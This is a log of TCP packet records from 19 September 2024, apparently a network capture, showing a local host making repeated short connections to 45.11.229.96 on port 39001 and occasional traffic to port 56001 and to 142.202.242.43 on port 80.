Sep 19, 2024 02:44:11.270546913 CEST	49929	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:11.384834051 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:11.449846983 CEST	39001	49929	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:11.590539932 CEST	39001	49930	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:11.590713024 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:12.711678982 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:13.123461008 CEST	39001	49930	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:13.123646975 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:13.372283936 CEST	39001	49930	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:13.372423887 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:13.372576952 CEST	49930	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:13.493911028 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:13.547219038 CEST	39001	49930	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:13.669419050 CEST	39001	49931	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:13.669729948 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:14.781868935 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:15.013626099 CEST	39001	49931	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:15.013823032 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:15.251858950 CEST	39001	49931	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:15.267045975 CEST	39001	49931	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:15.267180920 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:15.267374039 CEST	49931	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:15.384118080 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:15.441889048 CEST	39001	49931	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:15.581032991 CEST	39001	49932	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:15.581290960 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:16.683463097 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:16.936671972 CEST	39001	49932	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:16.936868906 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:17.148426056 CEST	39001	49932	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:17.148703098 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:17.148897886 CEST	49932	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:17.258658886 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:17.323760986 CEST	39001	49932	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:17.443691969 CEST	39001	49933	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:17.443871975 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:18.542923927 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:18.790266991 CEST	39001	49933	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:18.790457010 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:18.899378061 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:19.011904955 CEST	39001	49933	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:19.012075901 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:19.012254000 CEST	49933	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:19.076798916 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:19.133225918 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:19.192773104 CEST	39001	49933	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:19.241395950 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:19.309906960 CEST	39001	49934	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:19.310158014 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:20.408510923 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:20.716943979 CEST	39001	49934	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:20.717108011 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:20.916237116 CEST	39001	49934	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:20.916409016 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:20.916618109 CEST	49934	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:21.038836956 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:21.092865944 CEST	39001	49934	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:21.228558064 CEST	39001	49935	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:21.228996038 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.358671904 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.608515978 CEST	39001	49935	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:22.608705044 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.803601027 CEST	39001	49935	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:22.803801060 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.804017067 CEST	49935	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.929459095 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:22.978691101 CEST	39001	49935	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:23.153669119 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:23.153862000 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:23.196624041 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:23.613590956 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:23.616386890 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:23.616571903 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:23.740345955 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:24.017688990 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:24.266586065 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:24.642934084 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:24.643276930 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:24.837471962 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:24.837677956 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:24.837869883 CEST	49936	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:24.960269928 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:25.020514965 CEST	39001	49936	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:25.142677069 CEST	39001	49937	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:25.142934084 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.245831966 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.514837027 CEST	39001	49937	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:26.515049934 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.714658022 CEST	39001	49937	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:26.714823008 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.715101957 CEST	49937	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.834398985 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:26.896666050 CEST	39001	49937	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:27.010823011 CEST	39001	49938	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:27.011019945 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.124475002 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.313473940 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.529911995 CEST	39001	49938	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.530136108 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.545372009 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.545605898 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.742109060 CEST	39001	49938	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.742259026 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.742439032 CEST	49938	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.770361900 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.852648973 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.865272045 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:28.917273998 CEST	39001	49938	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:28.926655054 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:29.040486097 CEST	39001	49939	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:29.040756941 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:29.102099895 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:29.104875088 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:29.326514006 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:29.326673985 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:29.548527002 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:30.170037985 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:30.513842106 CEST	39001	49939	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:30.514034986 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:30.740737915 CEST	39001	49939	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:30.740914106 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:30.741092920 CEST	49939	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:30.864852905 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:30.934768915 CEST	39001	49939	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:31.042228937 CEST	39001	49940	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:31.042481899 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.149733067 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.373285055 CEST	39001	49940	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:32.373495102 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.602689028 CEST	39001	49940	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:32.602921963 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.603101969 CEST	49940	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.724031925 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:32.777684927 CEST	39001	49940	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:32.900978088 CEST	39001	49941	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:32.901199102 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.008536100 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.421487093 CEST	39001	49941	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:34.421757936 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.611027956 CEST	39001	49941	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:34.611202955 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.611361980 CEST	49941	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.739118099 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.786111116 CEST	39001	49941	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:34.914554119 CEST	39001	49942	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:34.914717913 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:34.970877886 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:35.142869949 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:35.237761021 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:36.034497976 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:36.263854980 CEST	39001	49942	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:36.264007092 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:36.415839911 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:36.445394039 CEST	39001	49942	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:36.445631027 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:36.445837021 CEST	49942	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:36.566703081 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:36.584485054 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:36.620346069 CEST	39001	49942	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:36.643696070 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:36.756258011 CEST	39001	49943	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:36.756469011 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:37.867125034 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:38.123894930 CEST	39001	49943	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:38.124141932 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:38.316523075 CEST	39001	49943	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:38.316725016 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:38.316906929 CEST	49943	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:38.425760984 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:38.497873068 CEST	39001	49943	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:38.608985901 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:38.609165907 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:39.081634045 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:39.312347889 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:39.312540054 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:39.530520916 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:39.726417065 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:39.956001997 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:39.956254959 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:40.148037910 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:40.148339033 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:40.148585081 CEST	49944	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:40.268903971 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:40.323128939 CEST	39001	49944	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:40.453030109 CEST	39001	49945	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:40.453258991 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:41.597397089 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:41.828974962 CEST	39001	49945	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:41.829183102 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:42.015104055 CEST	39001	49945	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:42.015352011 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:42.015558958 CEST	49945	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:42.143981934 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:42.192641973 CEST	39001	49945	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:42.320502996 CEST	39001	49946	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:42.320765972 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:43.445441008 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:43.717051983 CEST	39001	49946	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:43.717206955 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:43.919029951 CEST	39001	49946	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:43.919210911 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:43.919559956 CEST	49946	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:44.033811092 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:44.095146894 CEST	39001	49946	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:44.210664988 CEST	39001	49947	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:44.211013079 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.321367979 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.606312037 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:45.627234936 CEST	39001	49947	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:45.627518892 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.823343992 CEST	39001	49947	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:45.823537111 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.823719978 CEST	49947	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.829113960 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:45.939899921 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:45.985836983 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.000257015 CEST	39001	49947	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.116660118 CEST	39001	49948	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.116869926 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.203454971 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.203596115 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.404897928 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.625788927 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.758222103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.758378029 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.760900021 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:46.811580896 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:46.811835051 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.027662992 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.027887106 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.224618912 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.248436928 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.451889992 CEST	39001	49948	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.452099085 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.662307978 CEST	39001	49948	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.662481070 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.662679911 CEST	49948	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.782627106 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:47.842077971 CEST	39001	49948	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.977818966 CEST	39001	49949	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:47.978071928 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.090292931 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.327781916 CEST	39001	49949	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:49.327964067 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.510831118 CEST	39001	49949	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:49.510974884 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.511147022 CEST	49949	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.626214027 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:49.691035032 CEST	39001	49949	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:49.809393883 CEST	39001	49950	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:49.809567928 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:50.912477016 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:51.326662064 CEST	39001	49950	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:51.326826096 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:51.541747093 CEST	39001	49950	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:51.541913033 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:51.542244911 CEST	49950	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:51.656939030 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:51.721770048 CEST	39001	49950	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:51.837655067 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:51.837810040 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:52.242633104 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:52.513987064 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:52.514147043 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:52.826208115 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:52.944768906 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.326853991 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:53.327068090 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.518569946 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:53.518779993 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.518973112 CEST	49951	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.640911102 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.695374966 CEST	39001	49951	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:53.717503071 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:53.815841913 CEST	39001	49952	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:53.816144943 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:53.886375904 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:54.030361891 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:54.930186033 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:55.149534941 CEST	39001	49952	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:55.149735928 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:55.344536066 CEST	39001	49952	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:55.344708920 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:55.344877005 CEST	49952	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:55.468803883 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:55.519722939 CEST	39001	49952	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:55.645256042 CEST	39001	49953	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:55.645474911 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:56.755625963 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:57.014000893 CEST	39001	49953	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:57.014257908 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:57.195038080 CEST	39001	49953	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:57.195230961 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:57.195421934 CEST	49953	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:57.312138081 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:57.370281935 CEST	39001	49953	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:57.487334013 CEST	39001	49954	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:57.487576008 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:58.602447987 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:58.920062065 CEST	39001	49954	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:58.920202017 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:59.108449936 CEST	39001	49954	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:59.108676910 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:59.108844995 CEST	49954	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:59.217802048 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:59.283482075 CEST	39001	49954	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:59.392745018 CEST	39001	49955	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:59.393004894 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:00.505217075 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:00.734038115 CEST	39001	49955	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:00.734164953 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:00.918183088 CEST	39001	49955	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:00.918385029 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:00.918566942 CEST	49955	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:01.029711962 CEST	49956	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:01.087580919 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:01.096808910 CEST	39001	49955	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:01.138075113 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:01.208547115 CEST	39001	49956	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:01.208744049 CEST	49956	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:02.322881937 CEST	49956	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:02.625171900 CEST	39001	49956	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:02.625380039 CEST	49956	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:02.834117889 CEST	39001	49956	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:02.834291935 CEST	49956	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:02.834486961 CEST	49956	39001	192.168.11.30	45.11.229.96
